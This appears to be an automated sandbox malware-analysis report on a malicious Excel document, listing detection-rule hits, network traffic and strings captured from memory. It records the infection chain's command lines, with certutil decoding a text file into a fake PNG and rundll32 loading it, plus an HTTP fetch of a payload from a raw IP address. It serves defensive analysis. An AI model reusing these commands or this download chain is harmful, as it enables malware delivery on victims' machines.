Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, ProcessId: 3704 |
Source: Process started | Author: Florian Roth, juju4, keepwatch: Data: Command: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, ProcessId: 1488 |
Source: C:\Users\Public\94101.png | ReversingLabs: Detection: 35% |
Source: unknown | HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2 |
Source: global traffic | DNS query: name: yahoo.com |
Source: global traffic | TCP traffic: 192.168.2.3:49708 -> 74.6.143.26:443 |
Source: global traffic | TCP traffic: 192.168.2.3:49707 -> 172.104.129.156:80 |
Source: Joe Sandbox View | IP Address: 87.248.100.215 87.248.100.215 |
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic | HTTP traffic detected: GET /campo/o/o HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.104.129.156Connection: Keep-Alive |
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156 |
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156 |
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156 |
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156 |
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156 |
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10001000 EntryPoint,GetProcAddress,GetProcAddress,CreateDirectoryA,URLDownloadToFileA, | 6_2_10001000 |
Source: global traffic | HTTP traffic detected: GET /campo/o/o HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.104.129.156Connection: Keep-Alive |
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr | String found in binary or memory: <img src="https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&cv=2.0&cj=1&c14=-1" /> equals www.yahoo.com (Yahoo) |
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: C = {"useYAC":0,"usePE":0,"servicePath":"https:\/\/www.yahoo.com\/sdarla\/php\/fc.php","xservicePath":"","beaconPath":"https:\/\/www.yahoo.com\/sdarla\/php\/b.php","renderPath":"","allowFiF":false,"srenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","renderFile":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","sfbrenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-sf.html","msgPath":"https:\/\/fc.yahoo.com\/unsupported-1946.html","cscPath":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/html\/r-csc.html","root":"sdarla","edgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0","sedgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0","version":"4-6-0","tpbURI":"","hostFile":"https:\/\/s.yimg.com\/rq\/darla\/4-6-0\/js\/g-r-min.js","beaconsDisabled":true,"rotationTimingDisabled":true,"fdb_locale":"What don't you like about this ad?|It's offensive|Something else|Thank you for helping us improve your Yahoo experience|It's not relevant|It's distracting|I don't like this ad|Send|Done|Why do I see ads?|Learn more about your feedback.|Want an ad-free inbox? Upgrade to Yahoo Mail Pro!|Upgrade Now","positions":{"DEFAULT":{"supports":false},"HPSPON":{"w":1,"h":1},"FPAD":{"w":1,"h":1},"LREC":{"w":300,"h":250},"MAST":{"w":1,"h":1},"MON":{"w":1,"h":1},"LREC4":{"w":300,"h":250},"LREC3":{"w":300,"h":250}},"lang":"en-US"}; equals www.yahoo.com (Yahoo) |
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr | String found in binary or memory: C.positions = {"LREC":{"pos":"LREC","clean":"my-adsLREC","dest":"my-adsLREC-iframe","metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0,"lyr":0},"doubleBuffering":false},"MAST":{"pos":"MAST","clean":"my-adsMAST","dest":"my-adsMAST-iframe","fr":"expIfr_exp","rmxp":0,"metaSize":true,"w":970,"h":250,"supports":{"exp-ovr":1,"exp-push":1,"resize-to":1,"lyr":1},"closeBtn":{"adc":0,"mode":2,"useShow":1},"fclose":2,"fdb":{"1":"1","where":"inside","on":1},"doubleBuffering":false},"MON":{"pos":"MON","clean":"my-adsMON","dest":"my-adsMON-iframe","metaSize":true,"w":300,"h":600,"fdb":true,"supports":{"exp-ovr":1,"resize-to":1,"lyr":0}},"LREC4":{"pos":"LREC4","id":"LREC4","clean":"my-adsLREC4","dest":"my-adsLREC4-iframe","doubleBuffering":false,"metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0}},"LREC3":{"pos":"LREC3","id":"LREC3","clean":"my-adsLREC3","dest":"my-adsLREC3-iframe","metaSize":true,"w":300,"h":250,"fdb":true,"supports":{"exp-ovr":0}},"DEFAULT":{"sandbox":0,"meta":{"hostURL":"https:\/\/www.yahoo.com"}}}; equals www.yahoo.com (Yahoo) |
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr | String found in binary or memory: _comscore.push({"c1":"2","c2":"7241469","c5":"2023538075","c7":"https:\/\/www.yahoo.com\/","c14":-1}); equals www.yahoo.com (Yahoo) |
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: <link rel="canonical" href="https://www.yahoo.com/" /> <meta property="fb:pages" content="7040724713, 37510781596, 128015890542670, 73756409831, 1273983622628492, 183227235893, 107952415910993, 828031943896361, 338028696036, 228108177528276, 126435880711, 8603738371, 357311694375173, 168824166370, 116789651713844, 116789651713844, 284428852938, 116789651713844, 169590426398017, 150897358265131, 115060728528067, 358130347547704, 167601473274275, 166721106679241, 1573791532894850, 141301389258994, 138207559575213, 112996545439734, 345185573000, 131747896861126, 345185573000, 81262596234, 107143776010250, 137657892926963, 118757131504803" /> <meta name="referrer" content="unsafe-url"> <link href="https://s.yimg.com/os/yc/css/bundle.c60a6d54.css" rel="stylesheet" type="text/css"> equals www.yahoo.com (Yahoo) |
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: <meta property="og:url" content="http://www.yahoo.com" /> equals www.yahoo.com (Yahoo) |
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: <div><div id="footer-wrapper" role="contentinfo"><ul class="Lh(22px) Fz(13px) Ta(c)"><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html">Terms (Updated)</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html">Privacy (Updated)</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/advertising">Advertise</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html">About Our Ads</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://www.verizonmedia.com/careers">Careers</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://help.yahoo.com/kb/account">Help</a></li><li class="D(ib) Mend(6px)"><a class="Tt(c) C($c-fuji-grey-o) C(#0078ff):h" data-ylk="t1:a4;t2:ft;t3:lst;sec:ft;elm:link;itc:0;rspns:nav" href="https://yahoo.uservoice.com/forums/341361-yahoo-home?browser=ie&bucket=FPTRELUG105&os=windows%20nt&partner=none&location=US&rid=90oo801g0gagb">Feedback</a></li></ul></div></div> <!-- App close --> equals www.yahoo.com (Yahoo) |
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: s Breakthrough" aria-hidden="true" tabindex="-1"><div class="Fl(start) Maw(220px) W(26%) Mend(25px)"><div class="H(0) T(0px) Bdrs(2px) Start(0)" style="padding-bottom:52.11%"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/av/ads/1610831964757-4295.jpg.cf.jpg" alt=""/></div></div></a><div class="Ov(h) Pend(45px)"><div class="Pos(r) Z(2)"><a class="D(i) Ell Fz(13px) Mb(2px) Fw(b) C($streamItemGray) Td(n) Mend(6px)" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html" data-ylk="elm:itm;elmt:sp;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0" rel="nofollow noopener noreferrer" target="_blank">Ad</a><a class="D(i) Fz(12px) C($streamItemGray) Ell Mb(2px) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2h32LScnFLYzFp.DOwkXmPDtJ2ncDwX2gM3YotBJT_8WqYtq9N7Ss2iBl0BK2.5HBXOWYuhsKvWivKCpDJUJ3d8LGz_FK4XJTJxeEJfkBo1QeCkgm7RK.r70NeZ7QiQyrso3r3.KfAkDxkYR3p0kOjdGJphXX2Hr.g94q1GoJaLdsGaEh3E529_x73CS5WbWtOj83_nx2HcC3hHNr3uxXv_uGiemUUwjL8YewW3DVPd71mfocI281qx8LctOZlbyDP4.JMJL_OS7WWlw9x6McMaumrH0gb9wbJqZLmsEyeZ.6yq9pfI0tjLxcna24dBJQauhqNOIOEzSZIO17de9.1bv_gDmZXzrP1miP3qSj5hKSbVmCYyuYuG3AAGHP9dl_EVAde7afXi2OM0hio0YBkddeEgvIp1jvbbYiKZOGSRVz.5Y0z4cEwvQ6WwhJAj70Ej9WzuHfUuuruq5JTGwHwC9Cc2soYgPXOn5HTNmTpeqk2B9P5.AWIpNOi.NftSEMw.PxJceX9H17gsQig75qPUWC" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:itm;elmt:ad;itc:0;bpos:1;cpos:23;cposy:46;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:ad;g:36172530333;grpt:singlestory;pkgt:sponsored_img;pos:1;ad:1;itc:0">Physics Market News</a></div><div class="Pos(r) ad-content"><a class="D(b) Td(n) C($c-fuji-blue-4-b) ad-content:h_C($streamHoverClass)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=fQKaxu0GIS8L4ViC9YFGxIq6qeSf43.RmLTLfskM62lwTjP2h32LScnFLYzFp.DOwkXmPDtJ2ncDwX2gM3YotBJT_8WqYtq9N7Ss2iBl0BK2.5HBXOWYuhsKvWivKCpDJUJ3d8LGz_FK4XJTJxeEJfkBo1QeCkgm7RK.r70NeZ7QiQyrso3r3.KfAkDxkYR3p0kOjdGJphXX2Hr.g94q1GoJaLdsGaEh3E529_x73CS5WbWtOj83_nx2HcC3hHNr3uxXv_uGiemUUwjL8YewW3DVPd71mfocI281qx8LctOZlbyDP4.JMJL_OS7WWlw9x6McMaumrH0gb9wbJqZLmsEyeZ.6yq9pf |